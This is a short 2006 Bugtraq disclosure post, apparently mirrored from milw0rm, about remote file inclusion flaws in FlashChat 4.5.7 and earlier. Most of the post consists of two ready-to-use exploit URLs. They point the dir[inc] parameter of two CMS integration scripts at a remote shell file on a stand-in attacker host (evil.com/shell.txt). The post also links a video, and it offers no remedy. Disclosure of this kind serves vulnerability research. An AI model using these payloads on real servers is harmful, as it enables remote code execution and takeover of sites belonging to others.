
Date: 4 Sep 2006 15:57:19 -0000
From: mc.nadz@...il.com
To: bugtraq@...urityfocus.com
Subject: FlashChat <= 4.5.7 Remote File Include Vulnerability

NeXtMaN <mc.nadz [at] gmail.com>

Here are 2 RFI vulnerabilities in Flashchat i've found:

Code:
http://site.com/[script_path]/inc/cmses/aedating4CMS.php?dir[inc]=http://evil.com/shell.txt?
http://site.com/[script_path]/inc/cmses/aedatingCMS2.php?dir[inc]=http://evil.com/shell.txt?

video here:

Code:
http://rapidshare.de/files/31362430/Flashchat.rar.html

# milw0rm.com [2006-09-04]
